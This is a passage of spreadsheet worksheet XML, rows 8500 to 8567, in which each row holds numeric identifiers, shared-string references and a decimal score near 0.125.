      <c r="B8500" s="2">
        <v>5.4758446E7</v>
      </c>
      <c r="C8500" s="2" t="s">
        <v>8089</v>
      </c>
      <c r="D8500" s="2">
        <v>1.0</v>
      </c>
      <c r="E8500" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8500" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8501" ht="15.75" customHeight="1">
      <c r="A8501" s="1">
        <v>10143.0</v>
      </c>
      <c r="B8501" s="2">
        <v>5.7305907E7</v>
      </c>
      <c r="C8501" s="2" t="s">
        <v>8090</v>
      </c>
      <c r="D8501" s="2">
        <v>1.0</v>
      </c>
      <c r="E8501" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8501" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8502" ht="15.75" customHeight="1">
      <c r="A8502" s="1">
        <v>11583.0</v>
      </c>
      <c r="B8502" s="2">
        <v>2.2870404E7</v>
      </c>
      <c r="C8502" s="2" t="s">
        <v>8091</v>
      </c>
      <c r="D8502" s="2">
        <v>1.0</v>
      </c>
      <c r="E8502" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8502" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8503" ht="15.75" customHeight="1">
      <c r="A8503" s="1">
        <v>12230.0</v>
      </c>
      <c r="B8503" s="2">
        <v>2.7829914E7</v>
      </c>
      <c r="C8503" s="2" t="s">
        <v>8092</v>
      </c>
      <c r="D8503" s="2">
        <v>1.0</v>
      </c>
      <c r="E8503" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8503" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8504" ht="15.75" customHeight="1">
      <c r="A8504" s="1">
        <v>12270.0</v>
      </c>
      <c r="B8504" s="2">
        <v>2.8090765E7</v>
      </c>
      <c r="C8504" s="2" t="s">
        <v>8093</v>
      </c>
      <c r="D8504" s="2">
        <v>1.0</v>
      </c>
      <c r="E8504" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8504" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8505" ht="15.75" customHeight="1">
      <c r="A8505" s="1">
        <v>13400.0</v>
      </c>
      <c r="B8505" s="2">
        <v>3.4984681E7</v>
      </c>
      <c r="C8505" s="2" t="s">
        <v>8094</v>
      </c>
      <c r="D8505" s="2">
        <v>1.0</v>
      </c>
      <c r="E8505" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8505" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8506" ht="15.75" customHeight="1">
      <c r="A8506" s="1">
        <v>13824.0</v>
      </c>
      <c r="B8506" s="2">
        <v>3.675251E7</v>
      </c>
      <c r="C8506" s="2" t="s">
        <v>8095</v>
      </c>
      <c r="D8506" s="2">
        <v>1.0</v>
      </c>
      <c r="E8506" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8506" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8507" ht="15.75" customHeight="1">
      <c r="A8507" s="1">
        <v>14463.0</v>
      </c>
      <c r="B8507" s="2">
        <v>3.9483201E7</v>
      </c>
      <c r="C8507" s="2" t="s">
        <v>8096</v>
      </c>
      <c r="D8507" s="2">
        <v>1.0</v>
      </c>
      <c r="E8507" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8507" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8508" ht="15.75" customHeight="1">
      <c r="A8508" s="1">
        <v>15322.0</v>
      </c>
      <c r="B8508" s="2">
        <v>4.2514169E7</v>
      </c>
      <c r="C8508" s="2" t="s">
        <v>8097</v>
      </c>
      <c r="D8508" s="2">
        <v>1.0</v>
      </c>
      <c r="E8508" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8508" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8509" ht="15.75" customHeight="1">
      <c r="A8509" s="1">
        <v>15323.0</v>
      </c>
      <c r="B8509" s="2">
        <v>4.2514169E7</v>
      </c>
      <c r="C8509" s="2" t="s">
        <v>8098</v>
      </c>
      <c r="D8509" s="2">
        <v>1.0</v>
      </c>
      <c r="E8509" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8509" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8510" ht="15.75" customHeight="1">
      <c r="A8510" s="1">
        <v>15422.0</v>
      </c>
      <c r="B8510" s="2">
        <v>4.2891197E7</v>
      </c>
      <c r="C8510" s="2" t="s">
        <v>8099</v>
      </c>
      <c r="D8510" s="2">
        <v>1.0</v>
      </c>
      <c r="E8510" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8510" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8511" ht="15.75" customHeight="1">
      <c r="A8511" s="1">
        <v>16052.0</v>
      </c>
      <c r="B8511" s="2">
        <v>4.5228712E7</v>
      </c>
      <c r="C8511" s="2" t="s">
        <v>8100</v>
      </c>
      <c r="D8511" s="2">
        <v>1.0</v>
      </c>
      <c r="E8511" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8511" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8512" ht="15.75" customHeight="1">
      <c r="A8512" s="1">
        <v>16122.0</v>
      </c>
      <c r="B8512" s="2">
        <v>4.5490591E7</v>
      </c>
      <c r="C8512" s="2" t="s">
        <v>8101</v>
      </c>
      <c r="D8512" s="2">
        <v>1.0</v>
      </c>
      <c r="E8512" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8512" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8513" ht="15.75" customHeight="1">
      <c r="A8513" s="1">
        <v>16426.0</v>
      </c>
      <c r="B8513" s="2">
        <v>4.6322448E7</v>
      </c>
      <c r="C8513" s="2" t="s">
        <v>8102</v>
      </c>
      <c r="D8513" s="2">
        <v>1.0</v>
      </c>
      <c r="E8513" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8513" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8514" ht="15.75" customHeight="1">
      <c r="A8514" s="1">
        <v>16529.0</v>
      </c>
      <c r="B8514" s="2">
        <v>4.6706394E7</v>
      </c>
      <c r="C8514" s="2" t="s">
        <v>8103</v>
      </c>
      <c r="D8514" s="2">
        <v>1.0</v>
      </c>
      <c r="E8514" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8514" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8515" ht="15.75" customHeight="1">
      <c r="A8515" s="1">
        <v>16705.0</v>
      </c>
      <c r="B8515" s="2">
        <v>4.7413583E7</v>
      </c>
      <c r="C8515" s="2" t="s">
        <v>8104</v>
      </c>
      <c r="D8515" s="2">
        <v>1.0</v>
      </c>
      <c r="E8515" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8515" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8516" ht="15.75" customHeight="1">
      <c r="A8516" s="1">
        <v>16726.0</v>
      </c>
      <c r="B8516" s="2">
        <v>4.7488419E7</v>
      </c>
      <c r="C8516" s="2" t="s">
        <v>8105</v>
      </c>
      <c r="D8516" s="2">
        <v>1.0</v>
      </c>
      <c r="E8516" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8516" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8517" ht="15.75" customHeight="1">
      <c r="A8517" s="1">
        <v>17626.0</v>
      </c>
      <c r="B8517" s="2">
        <v>5.0380214E7</v>
      </c>
      <c r="C8517" s="2" t="s">
        <v>8106</v>
      </c>
      <c r="D8517" s="2">
        <v>1.0</v>
      </c>
      <c r="E8517" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8517" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8518" ht="15.75" customHeight="1">
      <c r="A8518" s="1">
        <v>17889.0</v>
      </c>
      <c r="B8518" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C8518" s="2" t="s">
        <v>8107</v>
      </c>
      <c r="D8518" s="2">
        <v>1.0</v>
      </c>
      <c r="E8518" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8518" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8519" ht="15.75" customHeight="1">
      <c r="A8519" s="1">
        <v>21855.0</v>
      </c>
      <c r="B8519" s="2">
        <v>2.7210848E7</v>
      </c>
      <c r="C8519" s="2" t="s">
        <v>8108</v>
      </c>
      <c r="D8519" s="2">
        <v>1.0</v>
      </c>
      <c r="E8519" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8519" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8520" ht="15.75" customHeight="1">
      <c r="A8520" s="1">
        <v>22154.0</v>
      </c>
      <c r="B8520" s="2">
        <v>3.1313844E7</v>
      </c>
      <c r="C8520" s="2" t="s">
        <v>8109</v>
      </c>
      <c r="D8520" s="2">
        <v>1.0</v>
      </c>
      <c r="E8520" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8520" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8521" ht="15.75" customHeight="1">
      <c r="A8521" s="1">
        <v>23805.0</v>
      </c>
      <c r="B8521" s="2">
        <v>7821823.0</v>
      </c>
      <c r="C8521" s="2" t="s">
        <v>8110</v>
      </c>
      <c r="D8521" s="2">
        <v>1.0</v>
      </c>
      <c r="E8521" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8521" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8522" ht="15.75" customHeight="1">
      <c r="A8522" s="1">
        <v>23852.0</v>
      </c>
      <c r="B8522" s="2">
        <v>8241638.0</v>
      </c>
      <c r="C8522" s="2" t="s">
        <v>8111</v>
      </c>
      <c r="D8522" s="2">
        <v>1.0</v>
      </c>
      <c r="E8522" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8522" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8523" ht="15.75" customHeight="1">
      <c r="A8523" s="1">
        <v>24290.0</v>
      </c>
      <c r="B8523" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C8523" s="2" t="s">
        <v>8112</v>
      </c>
      <c r="D8523" s="2">
        <v>1.0</v>
      </c>
      <c r="E8523" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8523" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8524" ht="15.75" customHeight="1">
      <c r="A8524" s="1">
        <v>25404.0</v>
      </c>
      <c r="B8524" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C8524" s="2" t="s">
        <v>8113</v>
      </c>
      <c r="D8524" s="2">
        <v>1.0</v>
      </c>
      <c r="E8524" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8524" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8525" ht="15.75" customHeight="1">
      <c r="A8525" s="1">
        <v>25802.0</v>
      </c>
      <c r="B8525" s="2">
        <v>1.4714742E7</v>
      </c>
      <c r="C8525" s="2" t="s">
        <v>8114</v>
      </c>
      <c r="D8525" s="2">
        <v>1.0</v>
      </c>
      <c r="E8525" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8525" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8526" ht="15.75" customHeight="1">
      <c r="A8526" s="1">
        <v>26093.0</v>
      </c>
      <c r="B8526" s="2">
        <v>1.569904E7</v>
      </c>
      <c r="C8526" s="2" t="s">
        <v>8115</v>
      </c>
      <c r="D8526" s="2">
        <v>1.0</v>
      </c>
      <c r="E8526" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8526" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8527" ht="15.75" customHeight="1">
      <c r="A8527" s="1">
        <v>27211.0</v>
      </c>
      <c r="B8527" s="2">
        <v>2.0966486E7</v>
      </c>
      <c r="C8527" s="2" t="s">
        <v>8116</v>
      </c>
      <c r="D8527" s="2">
        <v>1.0</v>
      </c>
      <c r="E8527" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8527" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8528" ht="15.75" customHeight="1">
      <c r="A8528" s="1">
        <v>27218.0</v>
      </c>
      <c r="B8528" s="2">
        <v>2.0973694E7</v>
      </c>
      <c r="C8528" s="2" t="s">
        <v>8117</v>
      </c>
      <c r="D8528" s="2">
        <v>1.0</v>
      </c>
      <c r="E8528" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8528" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8529" ht="15.75" customHeight="1">
      <c r="A8529" s="1">
        <v>28440.0</v>
      </c>
      <c r="B8529" s="2">
        <v>2.6516283E7</v>
      </c>
      <c r="C8529" s="2" t="s">
        <v>8118</v>
      </c>
      <c r="D8529" s="2">
        <v>1.0</v>
      </c>
      <c r="E8529" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8529" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8530" ht="15.75" customHeight="1">
      <c r="A8530" s="1">
        <v>29055.0</v>
      </c>
      <c r="B8530" s="2">
        <v>3.0243972E7</v>
      </c>
      <c r="C8530" s="2" t="s">
        <v>8119</v>
      </c>
      <c r="D8530" s="2">
        <v>1.0</v>
      </c>
      <c r="E8530" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8530" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8531" ht="15.75" customHeight="1">
      <c r="A8531" s="1">
        <v>29319.0</v>
      </c>
      <c r="B8531" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C8531" s="2" t="s">
        <v>8120</v>
      </c>
      <c r="D8531" s="2">
        <v>1.0</v>
      </c>
      <c r="E8531" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8531" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8532" ht="15.75" customHeight="1">
      <c r="A8532" s="1">
        <v>29403.0</v>
      </c>
      <c r="B8532" s="2">
        <v>3.2006939E7</v>
      </c>
      <c r="C8532" s="2" t="s">
        <v>8121</v>
      </c>
      <c r="D8532" s="2">
        <v>1.0</v>
      </c>
      <c r="E8532" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8532" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8533" ht="15.75" customHeight="1">
      <c r="A8533" s="1">
        <v>31004.0</v>
      </c>
      <c r="B8533" s="2">
        <v>4.7669643E7</v>
      </c>
      <c r="C8533" s="2" t="s">
        <v>8122</v>
      </c>
      <c r="D8533" s="2">
        <v>1.0</v>
      </c>
      <c r="E8533" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8533" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8534" ht="15.75" customHeight="1">
      <c r="A8534" s="1">
        <v>32610.0</v>
      </c>
      <c r="B8534" s="2">
        <v>5826655.0</v>
      </c>
      <c r="C8534" s="2" t="s">
        <v>8123</v>
      </c>
      <c r="D8534" s="2">
        <v>1.0</v>
      </c>
      <c r="E8534" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8534" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8535" ht="15.75" customHeight="1">
      <c r="A8535" s="1">
        <v>32971.0</v>
      </c>
      <c r="B8535" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C8535" s="2" t="s">
        <v>8124</v>
      </c>
      <c r="D8535" s="2">
        <v>1.0</v>
      </c>
      <c r="E8535" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8535" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8536" ht="15.75" customHeight="1">
      <c r="A8536" s="1">
        <v>11369.0</v>
      </c>
      <c r="B8536" s="2">
        <v>2.1386895E7</v>
      </c>
      <c r="C8536" s="2" t="s">
        <v>8125</v>
      </c>
      <c r="D8536" s="2">
        <v>1.0</v>
      </c>
      <c r="E8536" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8536" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="8537" ht="15.75" customHeight="1">
      <c r="A8537" s="1">
        <v>20271.0</v>
      </c>
      <c r="B8537" s="2">
        <v>1.1096155E7</v>
      </c>
      <c r="C8537" s="2" t="s">
        <v>8126</v>
      </c>
      <c r="D8537" s="2">
        <v>1.0</v>
      </c>
      <c r="E8537" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8537" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="8538" ht="15.75" customHeight="1">
      <c r="A8538" s="1">
        <v>33462.0</v>
      </c>
      <c r="B8538" s="2">
        <v>7933973.0</v>
      </c>
      <c r="C8538" s="2" t="s">
        <v>8127</v>
      </c>
      <c r="D8538" s="2">
        <v>1.0</v>
      </c>
      <c r="E8538" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8538" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="8539" ht="15.75" customHeight="1">
      <c r="A8539" s="1">
        <v>6605.0</v>
      </c>
      <c r="B8539" s="2">
        <v>4.9016981E7</v>
      </c>
      <c r="C8539" s="2" t="s">
        <v>8128</v>
      </c>
      <c r="D8539" s="2">
        <v>1.0</v>
      </c>
      <c r="E8539" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8539" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="8540" ht="15.75" customHeight="1">
      <c r="A8540" s="1">
        <v>5273.0</v>
      </c>
      <c r="B8540" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C8540" s="2" t="s">
        <v>8129</v>
      </c>
      <c r="D8540" s="2">
        <v>1.0</v>
      </c>
      <c r="E8540" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8540" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="8541" ht="15.75" customHeight="1">
      <c r="A8541" s="1">
        <v>9890.0</v>
      </c>
      <c r="B8541" s="2">
        <v>5.676011E7</v>
      </c>
      <c r="C8541" s="2" t="s">
        <v>8130</v>
      </c>
      <c r="D8541" s="2">
        <v>1.0</v>
      </c>
      <c r="E8541" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8541" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="8542" ht="15.75" customHeight="1">
      <c r="A8542" s="1">
        <v>27336.0</v>
      </c>
      <c r="B8542" s="2">
        <v>2.1451974E7</v>
      </c>
      <c r="C8542" s="2" t="s">
        <v>8131</v>
      </c>
      <c r="D8542" s="2">
        <v>1.0</v>
      </c>
      <c r="E8542" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8542" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="8543" ht="15.75" customHeight="1">
      <c r="A8543" s="1">
        <v>5406.0</v>
      </c>
      <c r="B8543" s="2">
        <v>4.5504114E7</v>
      </c>
      <c r="C8543" s="2" t="s">
        <v>8132</v>
      </c>
      <c r="D8543" s="2">
        <v>1.0</v>
      </c>
      <c r="E8543" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8543" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="8544" ht="15.75" customHeight="1">
      <c r="A8544" s="1">
        <v>6410.0</v>
      </c>
      <c r="B8544" s="2">
        <v>4.8519795E7</v>
      </c>
      <c r="C8544" s="2" t="s">
        <v>8133</v>
      </c>
      <c r="D8544" s="2">
        <v>1.0</v>
      </c>
      <c r="E8544" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8544" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="8545" ht="15.75" customHeight="1">
      <c r="A8545" s="1">
        <v>14906.0</v>
      </c>
      <c r="B8545" s="2">
        <v>4.1166605E7</v>
      </c>
      <c r="C8545" s="2" t="s">
        <v>8134</v>
      </c>
      <c r="D8545" s="2">
        <v>1.0</v>
      </c>
      <c r="E8545" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8545" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="8546" ht="15.75" customHeight="1">
      <c r="A8546" s="1">
        <v>23084.0</v>
      </c>
      <c r="B8546" s="2">
        <v>5.0644417E7</v>
      </c>
      <c r="C8546" s="2" t="s">
        <v>8135</v>
      </c>
      <c r="D8546" s="2">
        <v>1.0</v>
      </c>
      <c r="E8546" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8546" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="8547" ht="15.75" customHeight="1">
      <c r="A8547" s="1">
        <v>27050.0</v>
      </c>
      <c r="B8547" s="2">
        <v>2.031696E7</v>
      </c>
      <c r="C8547" s="2" t="s">
        <v>8136</v>
      </c>
      <c r="D8547" s="2">
        <v>1.0</v>
      </c>
      <c r="E8547" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8547" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="8548" ht="15.75" customHeight="1">
      <c r="A8548" s="1">
        <v>32093.0</v>
      </c>
      <c r="B8548" s="2">
        <v>5399868.0</v>
      </c>
      <c r="C8548" s="2" t="s">
        <v>8137</v>
      </c>
      <c r="D8548" s="2">
        <v>1.0</v>
      </c>
      <c r="E8548" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8548" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="8549" ht="15.75" customHeight="1">
      <c r="A8549" s="1">
        <v>16001.0</v>
      </c>
      <c r="B8549" s="2">
        <v>4.4969641E7</v>
      </c>
      <c r="C8549" s="2" t="s">
        <v>8138</v>
      </c>
      <c r="D8549" s="2">
        <v>1.0</v>
      </c>
      <c r="E8549" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8549" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="8550" ht="15.75" customHeight="1">
      <c r="A8550" s="1">
        <v>3258.0</v>
      </c>
      <c r="B8550" s="2">
        <v>3.7427937E7</v>
      </c>
      <c r="C8550" s="2" t="s">
        <v>8139</v>
      </c>
      <c r="D8550" s="2">
        <v>1.0</v>
      </c>
      <c r="E8550" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8550" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="8551" ht="15.75" customHeight="1">
      <c r="A8551" s="1">
        <v>692.0</v>
      </c>
      <c r="B8551" s="2">
        <v>2.0410877E7</v>
      </c>
      <c r="C8551" s="2" t="s">
        <v>8140</v>
      </c>
      <c r="D8551" s="2">
        <v>1.0</v>
      </c>
      <c r="E8551" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8551" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="8552" ht="15.75" customHeight="1">
      <c r="A8552" s="1">
        <v>23620.0</v>
      </c>
      <c r="B8552" s="2">
        <v>6514707.0</v>
      </c>
      <c r="C8552" s="2" t="s">
        <v>8141</v>
      </c>
      <c r="D8552" s="2">
        <v>1.0</v>
      </c>
      <c r="E8552" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8552" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="8553" ht="15.75" customHeight="1">
      <c r="A8553" s="1">
        <v>8145.0</v>
      </c>
      <c r="B8553" s="2">
        <v>5.3159785E7</v>
      </c>
      <c r="C8553" s="2" t="s">
        <v>8142</v>
      </c>
      <c r="D8553" s="2">
        <v>1.0</v>
      </c>
      <c r="E8553" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8553" s="2">
        <v>0.1247723132969034</v>
      </c>
    </row>
    <row r="8554" ht="15.75" customHeight="1">
      <c r="A8554" s="1">
        <v>14807.0</v>
      </c>
      <c r="B8554" s="2">
        <v>4.0924149E7</v>
      </c>
      <c r="C8554" s="2" t="s">
        <v>8143</v>
      </c>
      <c r="D8554" s="2">
        <v>1.0</v>
      </c>
      <c r="E8554" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8554" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="8555" ht="15.75" customHeight="1">
      <c r="A8555" s="1">
        <v>15912.0</v>
      </c>
      <c r="B8555" s="2">
        <v>4.4651527E7</v>
      </c>
      <c r="C8555" s="2" t="s">
        <v>8144</v>
      </c>
      <c r="D8555" s="2">
        <v>1.0</v>
      </c>
      <c r="E8555" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8555" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="8556" ht="15.75" customHeight="1">
      <c r="A8556" s="1">
        <v>906.0</v>
      </c>
      <c r="B8556" s="2">
        <v>2.2134681E7</v>
      </c>
      <c r="C8556" s="2" t="s">
        <v>8145</v>
      </c>
      <c r="D8556" s="2">
        <v>1.0</v>
      </c>
      <c r="E8556" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8556" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="8557" ht="15.75" customHeight="1">
      <c r="A8557" s="1">
        <v>12136.0</v>
      </c>
      <c r="B8557" s="2">
        <v>2.7070487E7</v>
      </c>
      <c r="C8557" s="2" t="s">
        <v>8146</v>
      </c>
      <c r="D8557" s="2">
        <v>1.0</v>
      </c>
      <c r="E8557" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8557" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="8558" ht="15.75" customHeight="1">
      <c r="A8558" s="1">
        <v>13095.0</v>
      </c>
      <c r="B8558" s="2">
        <v>3.3488955E7</v>
      </c>
      <c r="C8558" s="2" t="s">
        <v>8147</v>
      </c>
      <c r="D8558" s="2">
        <v>1.0</v>
      </c>
      <c r="E8558" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8558" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="8559" ht="15.75" customHeight="1">
      <c r="A8559" s="1">
        <v>19299.0</v>
      </c>
      <c r="B8559" s="2">
        <v>5.5214043E7</v>
      </c>
      <c r="C8559" s="2" t="s">
        <v>8148</v>
      </c>
      <c r="D8559" s="2">
        <v>1.0</v>
      </c>
      <c r="E8559" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8559" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="8560" ht="15.75" customHeight="1">
      <c r="A8560" s="1">
        <v>3269.0</v>
      </c>
      <c r="B8560" s="2">
        <v>3.7468415E7</v>
      </c>
      <c r="C8560" s="2" t="s">
        <v>8149</v>
      </c>
      <c r="D8560" s="2">
        <v>1.0</v>
      </c>
      <c r="E8560" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8560" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="8561" ht="15.75" customHeight="1">
      <c r="A8561" s="1">
        <v>28822.0</v>
      </c>
      <c r="B8561" s="2">
        <v>2.8800378E7</v>
      </c>
      <c r="C8561" s="2" t="s">
        <v>8150</v>
      </c>
      <c r="D8561" s="2">
        <v>1.0</v>
      </c>
      <c r="E8561" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8561" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="8562" ht="15.75" customHeight="1">
      <c r="A8562" s="1">
        <v>26384.0</v>
      </c>
      <c r="B8562" s="2">
        <v>1.6999988E7</v>
      </c>
      <c r="C8562" s="2" t="s">
        <v>8151</v>
      </c>
      <c r="D8562" s="2">
        <v>1.0</v>
      </c>
      <c r="E8562" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8562" s="2">
        <v>0.1242424242424243</v>
      </c>
    </row>
    <row r="8563" ht="15.75" customHeight="1">
      <c r="A8563" s="1">
        <v>7082.0</v>
      </c>
      <c r="B8563" s="2">
        <v>5.0269401E7</v>
      </c>
      <c r="C8563" s="2" t="s">
        <v>8152</v>
      </c>
      <c r="D8563" s="2">
        <v>1.0</v>
      </c>
      <c r="E8563" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8563" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="8564" ht="15.75" customHeight="1">
      <c r="A8564" s="1">
        <v>7128.0</v>
      </c>
      <c r="B8564" s="2">
        <v>5.0425599E7</v>
      </c>
      <c r="C8564" s="2" t="s">
        <v>8153</v>
      </c>
      <c r="D8564" s="2">
        <v>1.0</v>
      </c>
      <c r="E8564" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8564" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="8565" ht="15.75" customHeight="1">
      <c r="A8565" s="1">
        <v>8044.0</v>
      </c>
      <c r="B8565" s="2">
        <v>5.2845408E7</v>
      </c>
      <c r="C8565" s="2" t="s">
        <v>8154</v>
      </c>
      <c r="D8565" s="2">
        <v>1.0</v>
      </c>
      <c r="E8565" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8565" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="8566" ht="15.75" customHeight="1">
      <c r="A8566" s="1">
        <v>17824.0</v>
      </c>
      <c r="B8566" s="2">
        <v>5.0915743E7</v>
      </c>
      <c r="C8566" s="2" t="s">
        <v>8155</v>
      </c>
      <c r="D8566" s="2">
        <v>1.0</v>
      </c>
      <c r="E8566" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8566" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="8567" ht="15.75" customHeight="1">
      <c r="A8567" s="1">
        <v>3020.0</v>
      </c>
      <c r="B8567" s="2">
